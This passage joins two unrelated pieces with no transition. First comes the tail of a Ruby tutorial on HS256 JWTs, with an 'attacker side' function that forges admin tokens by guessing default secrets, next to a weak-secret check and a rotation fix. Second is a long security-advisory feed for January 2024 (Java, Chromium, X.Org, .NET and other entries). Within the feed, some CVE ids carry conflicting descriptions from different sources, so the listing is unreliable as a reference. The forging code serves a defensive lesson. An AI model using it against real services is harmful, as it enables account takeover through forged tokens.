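  expected = OpenSSL::HMAC.digest('SHA256', secret, "#{h}.#{p}")
  return nil unless constant_time_equal?(expected, b64url_decode(s))
  payload = JSON.parse(b64url_decode(p))
  payload.is_a?(Hash) ? payload : nil
rescue JSON::ParserError, ArgumentError
  nil
end

# Attacker side: with the secret known (or guessable from a short list of
# defaults), the attacker signs any claims they like and checks whether
# the server accepts the result. `accepted` stands in for a request to a
# protected endpoint. Returns [secret, token] on success, nil otherwise.
def forge_with_guessed_secret(claims, candidate_secrets, &accepted)
  candidate_secrets.each do |candidate|
    token = hs256_sign(claims, candidate)
    return [candidate, token] if accepted.call(token)
  end
  nil
end

# Server-side fix: refuse to run with a missing, short or well-known secret.
KNOWN_DEFAULTS = %w[secret changeme password].freeze

def weak_secret?(secret)
  secret.nil? || secret.bytesize < 32 || KNOWN_DEFAULTS.include?(secret)
end

def generate_secret
  SecureRandom.hex(32) # 256 bits, the minimum HS256 key size required by RFC 7518
end

if __FILE__ == $PROGRAM_NAME
  claims = { 'sub' => 'attacker', 'role' => 'admin' } # claim names are assumed
  server_secret = WEAK_DEFAULT_SECRET
  accepted = ->(tok) { !hs256_verify(tok, server_secret).nil? }
  secret, token = forge_with_guessed_secret(claims, KNOWN_DEFAULTS, &accepted)
  puts "forged with secret #{secret.inspect}: #{token}"
  server_secret = generate_secret
  puts "same token under a random 256-bit secret: #{accepted.call(token) ? 'accepted' : 'rejected'}"
end
```

Rotating to a random secret invalidates every token signed under the old one, which is the desired outcome after a disclosure like this: any session minted with `"secret"` must be treated as attacker-controlled.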
16.01.2024 10:00:00 | msrc | [MS:CVE-2024-20677] Microsoft Office Remote Code Execution Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20677
16.01.2024 10:00:00 | msrc | [MS:CVE-2024-0057] .NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0057
17.01.2024 20:17:38 | msrc | [MS:CVE-2024-0519] Chromium: CVE-2024-0519 Out of bounds memory access in V8 | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0519
17.01.2024 20:17:35 | msrc | [MS:CVE-2024-0518] Chromium: CVE-2024-0518 Type Confusion in V8 | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0518
17.01.2024 20:17:31 | msrc | [MS:CVE-2024-0517] Chromium: CVE-2024-0517 Out of bounds write in V8 | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0517
17.01.2024 19:43:02 | ubuntu | [USN-6588-1] PAM vulnerability | PAM could be made to stop responding if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6588-1
17.01.2024 07:20:49 | ubuntu | [USN-6538-2] PostgreSQL vulnerabilities (high) | Several security issues were fixed in PostgreSQL. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6538-2
17.01.2024 02:55:00 | amazonlinux | [ALAS2-2024-2414] Amazon Linux 2 2017.12 - ALAS2-2024-2414: important priority package update for java-11-amazon-corretto (important)

Package updates are available for Amazon Linux 2 that fix the following vulnerabilities:

CVE-2024-20952: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).

CVE-2024-20945: Crypto key may be leaked via debug logging in some cases.

CVE-2024-20926: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).

CVE-2024-20925: There are several integer overflows in the media handling.

CVE-2024-20923: Missing validation may cause unexpected issues.

CVE-2024-20922: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).

CVE-2024-20921: Loop optimizations are not correct when induction variable overflows.

CVE-2024-20919: With carefully crafted custom bytecodes, arbitrary unverified bytecodes could be executed.

CVE-2024-20918: A vulnerability that allows an attacker to execute arbitrary java code from the javascript engine even though the option "--no-java" was set.

https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2414

17.01.2024 02:55:00 | amazonlinux | [ALAS2-2024-2415] Amazon Linux 2 2017.12 - ALAS2-2024-2415: important priority package update for java-17-amazon-corretto (important)

Package updates are available for Amazon Linux 2 that fix the following vulnerabilities:

CVE-2024-20952: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).

CVE-2024-20945: Crypto key may be leaked via debug logging in some cases.

CVE-2024-20932: Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

CVE-2024-20925: There are several integer overflows in the media handling.

CVE-2024-20923: Missing validation may cause unexpected issues.

CVE-2024-20922: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).

CVE-2024-20921: Loop optimizations are not correct when induction variable overflows.

CVE-2024-20919: With carefully crafted custom bytecodes, arbitrary unverified bytecodes could be executed.

CVE-2024-20918: A vulnerability that allows an attacker to execute arbitrary java code from the javascript engine even though the option "--no-java" was set.

https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2415

17.01.2024 02:00:00 | cisa | [CISA-2024:0117] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (high)
CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0117

17.01.2024 02:00:00 | cpan | [CPANSA-Spreadsheet-ParseXLSX-2024-02] Spreadsheet-ParseXLSX vulnerability
In default configuration of Spreadsheet::ParseXLSX, whenever we call Spreadsheet::ParseXLSX->new()->parse('user_input_file.xlsx'), we'd be vulnerable to an XXE vulnerability if the XLSX file that we are parsing is from user input.
https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Spreadsheet-ParseXLSX-2024-02

17.01.2024 02:00:00 | debian | [DSA-5602-1] chromium
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5602-1

17.01.2024 02:00:00 | gentoo | [GLSA-202401-25] OpenJDK: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been discovered in OpenJDK, the worst of which can lead to remote code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-25

17.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0152] .NET 8.0 security update (important)
[8.0.101-1.0.1]
- Update to .NET SDK 8.0.101 and Runtime 8.0.1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0152

17.01.2024 02:00:00 | redhat | [RHSA-2024:0279] gstreamer-plugins-bad-free security update (important)
GStreamer is a streaming media framework based on graphs of filters which operate on media data. The gstreamer-plugins-bad-free package contains a collection of plug-ins for GStreamer.

Security Fix(es):

* gstreamer: MXF demuxer use-after-free vulnerability (CVE-2023-44446)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0279
17.01.2024 23:03:44 | rustsec | [RUSTSEC-2024-0003] Resource exhaustion vulnerability in h2 may lead to Denial of Service (DoS)
An attacker with an HTTP/2 connection to an affected endpoint can send a steady stream of invalid frames to force the generation of reset frames on the victim endpoint.

By closing their recv window, the attacker could then force these resets to be queued in an unbounded fashion, resulting in Out Of Memory (OOM) and high CPU usage.

This fix is corrected in [hyperium/h2#737](https://github.com/hyperium/h2/pull/737), which limits the total number of internal error resets emitted by default before the connection is closed.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0003

17.01.2024 02:00:00 | redhat | [RHSA-2024:0223] java-1.8.0-openjdk security and bug fix update (important)
The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* In the previous release in October 2023 (8u392), the RPMs were changed to use Provides for java, jre, java-headless, jre-headless, java-devel and java-sdk which included the full RPM version. This prevented the Provides being used to resolve a dependency on Java 1.8.0 (for example, "Requires: java-headless 1:1.8.0"). This change has now been reverted to the old "1:1.8.0" value. (RHEL-19630)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0223

17.01.2024 02:00:00 | redhat | [RHSA-2024:0232] java-11-openjdk security update (important)
The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0232

17.01.2024 02:00:00 | redhat | [RHSA-2024:0248] java-21-openjdk security update (important)
The java-21-openjdk packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0248

17.01.2024 02:00:00 | redhat | [RHSA-2024:0265] java-1.8.0-openjdk security and bug fix update (important)
The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* In the previous release in October 2023 (8u392), the RPMs on RHEL 8 were changed to use Provides for java, jre, java-headless, jre-headless, java-devel and java-sdk which included the full RPM version. This prevented the Provides being used to resolve a dependency on Java 1.8.0 (for example, "Requires: java-headless 1:1.8.0"). This change has now been reverted to the old "1:1.8.0" value. (RHEL-19636, RHEL-19637)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0265

17.01.2024 02:00:00 | redhat | [RHSA-2024:0267] java-17-openjdk security and bug fix update (important)
The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: incorrect handling of ZIP files with duplicate entries (8276123) (CVE-2024-20932)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* When Transparent Huge Pages (THP) are unconditionally enabled on a system, Java applications using many threads were found to have a large Resident Set Size (RSS). This was due to a race between the kernel transforming thread stack memory into huge pages and the Java Virtual Machine (JVM) shattering these pages into smaller ones when adding a guard page. This release resolves this issue by getting glibc to insert a guard page and prevent the creation of huge pages. (RHEL-13930, RHEL-13931, RHEL-13934, RHEL-13935)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0267

17.01.2024 02:00:00 | redhat | [RHSA-2024:0249] java-21-openjdk security update (important)
The java-21-openjdk packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0249
17.01.2024 01:41:58 | go | [GO-2024-2469] Kyberslash timing attack possible in github.com/kudelskisecurity/crystals-go
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2469

17.01.2024 00:15:42 | alpinelinux | [ALPINE:CVE-2024-20952] openjdk17, openjdk21, openjdk11 vulnerability (high)
[From CVE-2024-20952] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20952

17.01.2024 00:15:42 | alpinelinux | [ALPINE:CVE-2024-20955] openjdk17 vulnerability (low)
[From CVE-2024-20955] Vulnerability in the Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20955

17.01.2024 00:15:40 | alpinelinux | [ALPINE:CVE-2024-20926] openjdk17, openjdk11 vulnerability (medium)
[From CVE-2024-20926] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20926

17.01.2024 00:15:40 | alpinelinux | [ALPINE:CVE-2024-20932] openjdk17 vulnerability (high)
[From CVE-2024-20932] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20932

17.01.2024 00:15:39 | alpinelinux | [ALPINE:CVE-2024-20918] openjdk21, openjdk17, openjdk11 vulnerability (high)
[From CVE-2024-20918] Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20918
16.01.2024 23:16:14 | go | [GO-2024-2464] Remote command execution in github.com/0xJacky/Nginx-UI (high)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2464

16.01.2024 23:04:29 | go | [GO-2024-2463] SQL injection in github.com/0xJacky/Nginx-UI (high)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2463

17.01.2024 12:35:23 | almalinux | [ALSA-2024:0113] kernel security update (important)
kernel security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0113

18.01.2024 20:21:32 | ubuntu | [USN-6590-1] Xerces-C++ vulnerabilities (high)
Several security issues were fixed in Xerces-C++.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6590-1

18.01.2024 19:55:52 | ubuntu | [USN-6589-1] FileZilla vulnerability (medium)
FileZilla could be made to expose sensitive information over the network.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6589-1

18.01.2024 18:15:08 | alpinelinux | [ALPINE:CVE-2024-0408] xorg-server, xwayland vulnerability (medium)
[From CVE-2024-0408] A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0408

18.01.2024 18:15:08 | alpinelinux | [ALPINE:CVE-2024-0409] xorg-server, xwayland vulnerability
[From CVE-2024-0409] A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0409

18.01.2024 07:15:08 | alpinelinux | [ALPINE:CVE-2023-6816] xwayland, xorg-server vulnerability (high)
[From CVE-2023-6816] A flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6816

18.01.2024 02:00:00 | cisa | [CISA-2024:0118] CISA Adds One Known Exploited Vulnerability to Catalog (critical)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0118

18.01.2024 02:00:00 | oraclelinux | [ELSA-2024-12078] python3.11-cryptography security update (important)
[37.0.2-5.0.1]
- Fix CVE-2023-49083: NULL-dereference when loading PKCS7 certificates [Orabug: 36143834]
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12078

18.01.2024 02:00:00 | oraclelinux | [ELSA-2024-12079] python-cryptography security update (important)
[3.2.1-6.0.1]
- Fix CVE-2023-49083: NULL-dereference when loading PKCS7 certificates [Orabug: 36143834]
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12079

18.01.2024 02:00:00 | redhat | [RHSA-2024:0266] java-11-openjdk security update (important)
